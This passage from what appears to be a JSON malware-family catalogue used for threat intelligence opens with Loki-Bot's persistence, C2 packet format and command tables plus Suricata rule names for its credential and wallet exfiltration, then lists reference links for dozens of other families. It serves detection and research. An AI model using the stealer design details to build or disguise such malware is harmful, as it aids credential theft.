command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets.\" - PhishMe\r\n\r\nLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.\r\n\r\nLoki-Bot accepts a single argument/switch of \u2018-u\u2019 that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.\r\n\r\nThe Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: \u201cB7E1C2CC98066B250DDB2123\u201c.\r\n\r\nLoki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: \u201c%APPDATA%\\ C98066\\\u201d.\r\n\r\nThere can be four files within the hidden %APPDATA% directory at any given time: \u201c.exe,\u201d \u201c.lck,\u201d \u201c.hdb\u201d and \u201c.kdb.\u201d They will be named after characters 13 thru 18 of the Mutex. For example: \u201c6B250D.\u201d Below is the explanation of their purpose:\r\n\r\nFILE EXTENSION\tFILE DESCRIPTION\r\n.exe\tA copy of the malware that will execute every time the user account is logged into\r\n.lck\tA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts\r\n.hdb\tA database of hashes for data that has already been exfiltrated to the C2 server\r\n.kdb\tA database of keylogger data that has yet to be sent to the C2 server\r\n\r\nIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.\r\n\r\nThe first packet transmitted by Loki-Bot contains application data.\r\n\r\nThe second packet transmitted by Loki-Bot contains decrypted Windows credentials.\r\n\r\nThe third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. 
By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.\r\n\r\nCommunications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.\r\n\r\nThe first WORD of the HTTP Payload represents the Loki-Bot version.\r\n\r\nThe second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:\r\n\r\nBYTE\tPAYLOAD TYPE\r\n0x26\tStolen Cryptocurrency Wallet\r\n0x27\tStolen Application Data\r\n0x28\tGet C2 Commands from C2 Server\r\n0x29\tStolen File\r\n0x2A\tPOS (Point of Sale?)\r\n0x2B\tKeylogger Data\r\n0x2C\tScreenshot\r\n\r\nThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically \u201cckav.ru\u201d. If you come across a Binary ID that is different from this, take note!\r\n\r\nLoki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.\r\n\r\nThe Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. 
This is likely used as a protection against researchers who wish to poke and prod at Loki-Bot\u2019s C2 infrastructure.\r\n\r\nLoki-Bot can accept the following instructions from the C2 Server:\r\n\r\nBYTE\tINSTRUCTION DESCRIPTION\r\n0x00\tDownload EXE & Execute\r\n0x01\tDownload DLL & Load #1\r\n0x02\tDownload DLL & Load #2\r\n0x08\tDelete HDB File\r\n0x09\tStart Keylogger\r\n0x0A\tMine & Steal Data\r\n0x0E\tExit Loki-Bot\r\n0x0F\tUpgrade Loki-Bot\r\n0x10\tChange C2 Polling Frequency\r\n0x11\tDelete Executables & Exit\r\n\r\nSuricata Signatures\r\nRULE SID\tRULE NAME\r\n2024311\tET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected\r\n2024312\tET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M1\r\n2024313\tET TROJAN Loki Bot Request for C2 Commands Detected M1\r\n2024314\tET TROJAN Loki Bot File Exfiltration Detected\r\n2024315\tET TROJAN Loki Bot Keylogger Data Exfiltration Detected M1\r\n2024316\tET TROJAN Loki Bot Screenshot Exfiltration Detected\r\n2024317\tET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M2\r\n2024318\tET TROJAN Loki Bot Request for C2 Commands Detected M2\r\n2024319\tET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.luminosity_rat", - "https://researchcenter.paloaltonetworks.com/2016/07/unit42-investigating-the-luminositylink-remote-access-trojan-configuration/", - "https://researchcenter.paloaltonetworks.com/2018/02/unit42-rat-trapped-luminositylink-falls-foul-vermin-eradication-efforts/", - "https://www.proofpoint.com/us/threat-insight/post/Light-After-Dark", - "https://umbrella.cisco.com/blog/2017/01/18/finding-the-rats-nest/", - "http://malwarenailed.blogspot.com/2016/07/luminosity-rat-re-purposed.html", - "https://krebsonsecurity.com/2018/07/luminositylink-rat-author-pleads-guilty/" - ] - }, - "uuid": "e145863e-f3bd-489c-91f6-0c2b7e9cc59a", - "value": 
"Luminosity RAT", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.lurk", - "https://www.secureworks.com/research/malware-analysis-of-the-lurk-downloader" - ] - }, - "uuid": "929112e4-e252-4273-b3c2-fd414cfb2776", - "value": "Lurk", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.luzo" - ] - }, - "uuid": "8c0d3012-9dcb-46d3-964f-8a3c5b58d1b2", - "value": "Luzo", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Lucky Locker", - "Adneukine", - "Bomba Locker" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.lyposit", - "https://blog.avast.com/2013/05/20/lockscreen-win32lyposit-displayed-as-a-fake-macos-app/", - "http://malware.dontneedcoffee.com/2012/11/inside-view-of-lyposit-aka-for-its.html", - "http://malware.dontneedcoffee.com/2013/05/unveiling-locker-bomba-aka-lucky-locker.html" - ] - }, - "uuid": "0dea3e9d-b443-40f6-a9e0-ba622850ee8a", - "value": "Lyposit", - "description": "" - }, - { - "meta": { - "synonyms": [ - "El Machete" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.machete", - "https://securelist.com/el-machete/66108/", - "https://www.cylance.com/en_us/blog/el-machete-malware-attacks-cut-through-latam.html", - "https://medium.com/@verovaleros/el-machete-what-do-we-know-about-the-apt-targeting-latin-america-be7d11e690e6" - ] - }, - "uuid": "9a724a1d-7eb1-4e2b-8cc3-e1b41e8b5cff", - "value": "Machete", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.madmax", - "https://www.arbornetworks.com/blog/asert/mad-max-dga/" - ] - }, - "uuid": "42760c2c-bf00-4ace-871c-6dcbbd90b2de", - "value": "MadMax", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.magala", - "https://securelist.com/the-magala-trojan-clicker-a-hidden-advertising-threat/78920/" - ] - }, - "uuid": "192f93bc-fcf6-4aaf-ae2f-d9435a67e48b", - "value": "Magala", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.magniber", - "https://blog.malwarebytes.com/threat-analysis/2017/10/magniber-ransomware-exclusively-for-south-koreans/", - "https://www.youtube.com/watch?v=lqWJaaofNf4", - "http://asec.ahnlab.com/1124" - ] - }, - "uuid": "fedac411-0638-48dc-8ac5-1b4171fa8a29", - "value": "Magniber", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.majik_pos", - "http://blog.trendmicro.com/trendlabs-security-intelligence/majikpos-combines-pos-malware-and-rats/" - ] - }, - "uuid": "c1144eb8-a2bc-48d7-b0fb-18f124c1f8d9", - "value": "MajikPos", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.makadocs", - "http://contagiodump.blogspot.com/2012/12/nov-2012-backdoorw32makadocs-sample.html", - "https://www.symantec.com/connect/blogs/malware-targeting-windows-8-uses-google-docs" - ] - }, - "uuid": "996e73e9-b093-4987-9992-f52008e55b24", - "value": "Makadocs", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.makloader", - "https://twitter.com/James_inthe_box/status/1046844087469391872" - ] - }, - "uuid": "7e088669-3ddb-4cc5-bc9b-ae59f61ada82", - "value": "MakLoader", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.maktub", - "https://blog.malwarebytes.com/threat-analysis/2016/03/maktub-locker-beautiful-and-dangerous/", - 
"https://bartblaze.blogspot.de/2018/04/maktub-ransomware-possibly-rebranded-as.html",
- "https://www.intezer.com/iron-cybercrime-group-under-the-scope-2/"
- ]
- },
- "uuid": "bdb27944-1f79-46f7-a0d7-c344429790c2",
- "value": "Maktub",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.malumpos",
- "http://documents.trendmicro.com/images/tex/pdf/MalumPOS%20Technical%20Brief.pdf"
- ]
- },
- "uuid": "159b0dbf-52f6-4690-a545-0f890ba7b9b7",
- "value": "MalumPOS",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [
- "HDDCryptor",
- "DiskCryptor"
- ],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.mamba",
- "http://blog.trendmicro.com/trendlabs-security-intelligence/bksod-by-ransomware-hddcryptor-uses-commercial-tools-to-encrypt-network-shares-and-lock-hdds/",
- "https://securelist.com/the-return-of-mamba-ransomware/79403/"
- ]
- },
- "uuid": "df320366-7970-4af0-b1f4-9f9492dede53",
- "value": "Mamba",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [
- "CryptoHost"
- ],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.manamecrypt",
- "https://www.bleepingcomputer.com/news/security/cryptohost-decrypted-locks-files-in-a-password-protected-rar-file/",
- "https://www.gdatasoftware.com/blog/2016/04/28234-manamecrypt-a-ransomware-that-takes-a-different-route"
- ]
- },
- "uuid": "54cd671e-b7e4-4dd3-9bfa-dc0ba5105944",
- "value": "ManameCrypt",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [
- "junidor",
- "mengkite",
- "vedratve"
- ],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.mangzamel",
- "https://www.hybrid-analysis.com/sample/5d631d77401615d53f3ce3dbc2bfee5d934602dc35d488aa7cebf9b3ff1c4816?environmentId=2"
- ]
- },
- "uuid": "ed3a94c9-8a5a-4ae7-bdd9-b000e01df3a0",
- "value": "Mangzamel",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.manifestus_ransomware",
- "https://twitter.com/struppigel/status/811587154983981056"
- ]
- },
- "uuid": "5b75db42-b8f2-4e52-81d3-f329e49e1af2",
- "value": "Manifestus",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.manitsme",
- "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf"
- ]
- },
- "uuid": "13b0d9ff-0be0-4539-8c86-dfca7a0e79f6",
- "value": "ManItsMe",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.mapiget",
- "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf"
- ]
- },
- "uuid": "8a97307f-a029-4c43-88e1-debed2b80b14",
- "value": "MAPIget",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.marap",
- "https://www.proofpoint.com/us/threat-insight/post/new-modular-downloaders-fingerprint-systems-prepare-more-part-1-marap"
- ]
- },
- "uuid": "c2c3ac24-6921-4bba-a2c8-ac3d364feaeb",
- "value": "Marap",
- "description": "Marap is a downloader, named after its command and control (C&C) phone home parameter \"param\" spelled backwards. It is written in C and contains a few notable anti-analysis features."
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.matrix_banker",
- "https://www.arbornetworks.com/blog/asert/another-banker-enters-matrix/"
- ]
- },
- "uuid": "59717468-271e-4d15-859a-130681c17ddb",
- "value": "Matrix Banker",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.matrix_ransom"
- ]
- },
- "uuid": "118ced99-5942-497f-885a-2b25d0569b4b",
- "value": "Matrix Ransom",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.matryoshka_rat",
- "http://www.clearskysec.com/tulip/"
- ]
- },
- "uuid": "c8a7c6e7-c6d3-4978-8a1d-190162de5e0d",
- "value": "Matryoshka RAT",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.matsnu",
- "https://blog.checkpoint.com/wp-content/uploads/2015/07/matsnu-malwareid-technical-brief.pdf"
- ]
- },
- "uuid": "f566d597-d0c4-4932-b738-ac5774eedb7a",
- "value": "Matsnu",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [
- "DexLocker"
- ],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.mbrlock",
- "https://www.bleepingcomputer.com/news/security/dexcrypt-mbrlocker-demands-30-yuan-to-gain-access-to-computer/",
- "https://www.hybrid-analysis.com/sample/dfc56a704b5e031f3b0d2d0ea1d06f9157758ad950483b44ac4b77d33293cb38?environmentId=100",
- "https://app.any.run/tasks/0a7e643f-7562-4575-b8a5-747bd6b5f02d",
- "http://id-ransomware.blogspot.com.tr/2018/02/mbrlock-hax-ransomware.html"
- ]
- },
- "uuid": "41177275-7e6d-4ebd-a4df-d2cc733f7791",
- "value": "MBRlock",
- "description": " This ransomware modifies the master boot record of the victim's computer so that it shows a ransom note before Windows starts."
- },
- {
- "meta": {
- "synonyms": [
- "MyBios"
- ],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.mebromi",
- "http://contagiodump.blogspot.com/2011/09/mebromi-bios-rootkit-affecting-award.html",
- "https://www.symantec.com/connect/blogs/bios-threat-showing-again",
- "http://www.theregister.co.uk/2011/09/14/bios_rootkit_discovered/",
- "https://www.webroot.com//blog/2011/09/13/mebromi-the-first-bios-rootkit-in-the-wild/"
- ]
- },
- "uuid": "342be00c-cf68-45a6-8f90-3a2d2d20bda6",
- "value": "Mebromi",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.medre",
- "http://contagiodump.blogspot.com/2012/06/medrea-autocad-worm-samples.html"
- ]
- },
- "uuid": "243ae1f7-183e-4ea9-82cf-3353a0ef78f4",
- "value": "Medre",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.medusa",
- "https://webcache.googleusercontent.com/search?q=cache:ZbKznF-dogcJ:https://www.toolbase.me/board/topic/10061-b-medusa-irc-ddos-botnet-bypass-cf-cookie-protections/",
- "https://news.drweb.com/show/?i=10302&lng=en",
- "https://www.arbornetworks.com/blog/asert/medusahttp-ddos-slithers-back-spotlight/",
- "https://zerophagemalware.com/2017/10/13/rig-ek-via-malvertising-drops-a-miner/"
- ]
- },
- "uuid": "237a1c2d-eb14-483d-9a2e-82f10b63ec06",
- "value": "win.medusa",
- "description": "Medusa is a DDoS bot written in .NET 2.0. In its current incarnation its C&C protocol is based on HTTP, while its predecessor made use of IRC."
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.mewsei"
- ]
- },
- "uuid": "48cb12ee-c60a-46cd-b376-39226027c616",
- "value": "Mewsei",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.miancha",
- "https://www.contextis.com//documents/30/TA10009_20140127_-_CTI_Threat_Advisory_-_The_Monju_Incident1.pdf"
- ]
- },
- "uuid": "a3370013-6c47-422e-a4d4-1b86ee71e5e5",
- "value": "Miancha",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.micrass",
- "https://researchcenter.paloaltonetworks.com/2016/09/mile-tea-cyber-espionage-campaign-targets-asia-pacific-businesses-and-government-agencies/"
- ]
- },
- "uuid": "6c09cc53-7160-47c6-8df8-3e0d42deb5a6",
- "value": "Micrass",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.microcin",
- "https://securelist.com/a-simple-example-of-a-complex-cyberattack/82636/",
- "https://cdn.securelist.com/files/2017/09/Microcin_Technical_4PDF_eng_final_s.pdf"
- ]
- },
- "uuid": "185d8b28-0179-4ec6-a3c8-201b1936b9aa",
- "value": "Microcin",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.micropsia",
- "http://researchcenter.paloaltonetworks.com/2017/04/unit42-targeted-attacks-middle-east-using-kasperagent-micropsia/",
- "http://blog.talosintelligence.com/2017/06/palestine-delphi.html",
- "https://research.checkpoint.com/apt-attack-middle-east-big-bang/"
- ]
- },
- "uuid": "b37f312f-a0b1-41a9-88ae-da2844c19cae",
- "value": "Micropsia",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.mikoponi"
- ]
- },
- "uuid": "87abb59d-0012-4d45-9e75-136372b25bf8",
- "value": "Mikoponi",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.milkmaid",
- "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
- ]
- },
- "uuid": "801d8a6a-b7ba-4557-af5d-1005e53145e2",
- "value": "MILKMAID",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.mimikatz",
- "https://github.com/gentilkiwi/mimikatz",
- " https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks",
- "https://www.wired.com/story/how-mimikatz-became-go-to-hacker-tool/",
- "http://blog.gentilkiwi.com/securite/un-observateur-evenements-aveugle"
- ]
- },
- "uuid": "588fb91d-59c6-4667-b299-94676d48b17b",
- "value": "MimiKatz",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.miniasp",
- "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf"
- ]
- },
- "uuid": "a4f8bacf-2076-4e00-863c-874cdd833a41",
- "value": "MiniASP",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.mirage",
- "https://www.intezer.com/miragefox-apt15-resurfaces-with-new-tools-based-on-old-ones/"
- ]
- },
- "uuid": "6f6da371-2d62-4245-9aa3-8570e39222ae",
- "value": "Mirage",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.miragefox",
- "https://www.intezer.com/miragefox-apt15-resurfaces-with-new-tools-based-on-old-ones/"
- ]
- },
- "uuid": "b3e89b03-c5af-41cd-88b8-e15335abbb30",
- "value": "MirageFox",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.mirai",
- "https://twitter.com/PhysicalDrive0/status/830070569202749440",
- "https://securelist.com/blog/research/77621/newish-mirai-spreader-poses-new-risks/",
- "https://www.incapsula.com/blog/new-mirai-variant-ddos-us-college.html"
- ]
- },
- "uuid": "17e12216-a303-4a00-8283-d3fe92d0934c",
- "value": "Mirai",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.misdat",
- "https://www.cylance.com/content/dam/cylance/pdfs/reports/Op_Dust_Storm_Report.pdf"
- ]
- },
- "uuid": "d1597713-fe7a-45bd-8b59-1a13c7e097d8",
- "value": "Misdat",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [
- "MixFox",
- "ModPack"
- ],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.misfox"
- ]
- },
- "uuid": "b4c33277-ec15-4bb3-89ef-314ecfa100da",
- "value": "Misfox",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.miuref"
- ]
- },
- "uuid": "4c786624-4a55-46e6-849d-b65552034235",
- "value": "Miuref",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.mm_core",
- "https://blogs.forcepoint.com/security-labs/mm-core-memory-backdoor-returns-bigboss-and-sillygoose"
- ]
- },
- "uuid": "6363cc2f-08f1-47a0-adbf-5cf19ea89ffd",
- "value": "MM Core",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.mobi_rat",
- "https://blog.malwarebytes.com/threat-analysis/2017/07/malware-abusing-ffmpeg/"
- ]
- },
- "uuid": "e33aa1f8-a631-4274-afe0-f2fd3426332e",
- "value": "MobiRAT",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.mocton"
- ]
- },
- "uuid": "7132c1de-9a3f-4f08-955f-ab6f7a09e17d",
- "value": "Mocton",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [
- "straxbot"
- ],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.modpos",
- "https://www.fireeye.com/blog/threat-research/2015/11/modpos.html",
- "https://twitter.com/physicaldrive0/status/670258429202530306"
- ]
- },
- "uuid": "026d638b-cc51-4eff-97fc-d61215a1a70a",
- "value": "ModPOS",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.moker",
- "https://breakingmalware.com/malware/moker-part-1-dissecting-a-new-apt-under-the-microscope/",
- "https://breakingmalware.com/malware/moker-part-2-capabilities/",
- "http://blog.ensilo.com/moker-a-new-apt-discovered-within-a-sensitive-network",
- "https://blog.malwarebytes.com/threat-analysis/2017/04/elusive-moker-trojan/"
- ]
- },
- "uuid": "90a1a61e-3e69-4b92-ac11-9095ac2d9cf4",
- "value": "Moker",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.mokes",
- "https://securelist.com/from-linux-to-windows-new-family-of-cross-platform-desktop-backdoors-discovered/73503/"
- ]
- },
- "uuid": "6d5a5357-4126-4950-b8c3-ee78b1172217",
- "value": "Mokes",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.mole",
- "https://www.proofpoint.com/us/threat-insight/post/adgholas-malvertising-campaign-using-astrum-ek-deliver-mole-ransomware",
- "https://www.cert.pl/en/news/single/mole-ransomware-analysis-and-decryptor/"
- ]
- },
- "uuid": "aaeaf9ee-2f3d-4141-9d45-ec383ba8445f",
- "value": "Mole",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.molerat_loader",
- "http://www.clearskysec.com/iec/",
- "https://kc.mcafee.com/resources/sites/MCAFEE/content/live/PRODUCT_DOCUMENTATION/26000/PD26760/en_US/McAfee_Labs_Threat_Advisory_GazaCybergang.pdf"
- ]
- },
- "uuid": "b50408c3-6676-4d3f-8a97-9114c215b67a",
- "value": "Molerat Loader",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [
- "CoinMiner"
- ],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.monero_miner",
- "https://www.welivesecurity.com/2017/09/28/monero-money-mining-malware/"
- ]
- },
- "uuid": "c57a4168-cd09-4611-a665-bbcede80f42b",
- "value": "Monero Miner",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.moonwind",
- "http://researchcenter.paloaltonetworks.com/2017/03/unit42-trochilus-rat-new-moonwind-rat-used-attack-thai-utility-organizations/"
- ]
- },
- "uuid": "8465177f-16c8-47fc-a4c8-f4c0409fe460",
- "value": "MoonWind",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.morphine"
- ]
- },
- "uuid": "9de41613-7762-4a88-8e9a-4e621a127f32",
- "value": "Morphine",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.morto",
- "http://contagiodump.blogspot.com/2011/08/aug-28-morto-tsclient-rdp-worm-with.html",
- "https://www.f-secure.com/weblog/archives/00002227.html",
- "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Worm:Win32/Morto.A"
- ]
- },
- "uuid": "c931dc7d-9373-4545-911c-ad5589670c40",
- "value": "Morto",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.mosquito",
- "https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf",
- "https://www.welivesecurity.com/2018/05/22/turla-mosquito-shift-towards-generic-tools/"
- ]
- },
- "uuid": "663df641-d396-4e93-93bd-bb9609ceb0ba",
- "value": "Mosquito",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.moure"
- ]
- },
- "uuid": "bd3468e4-5e00-46e6-a884-6eda1b246394",
- "value": "Moure",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.mozart",
- "https://securitykitten.github.io/2015/01/11/the-mozart-ram-scraper.html"
- ]
- },
- "uuid": "dde61acb-8c0f-4a3a-8450-96e233f2ddc1",
- "value": "mozart",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.mpk",
- "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/",
- "https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf"
- ]
- },
- "uuid": "a37c826a-bb30-49fb-952a-63b1cab366c3",
- "value": "MPK",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.mpkbot",
- "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/",
- "https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf"
- ]
- },
- "uuid": "2363dc9f-822a-4581-8d5f-1fc436e70621",
- "value": "MPKBot",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.multigrain_pos",
- "https://www.fireeye.com/blog/threat-research/2016/04/multigrain_pointo.html",
- "https://www.pandasecurity.com/mediacenter/malware/multigrain-malware-pos/"
- ]
- },
- "uuid": "c513c490-7c76-42ab-a51f-cc780faa7146",
- "value": "Multigrain POS",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.murkytop",
- "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html"
- ]
- },
- "uuid": "2685ea45-06f4-46e0-9397-eff8844db855",
- "value": "murkytop",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.murofet"
- ]
- },
- "uuid": "f7081626-130a-48d5-83a9-759b3ef198ec",
- "value": "Murofet",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
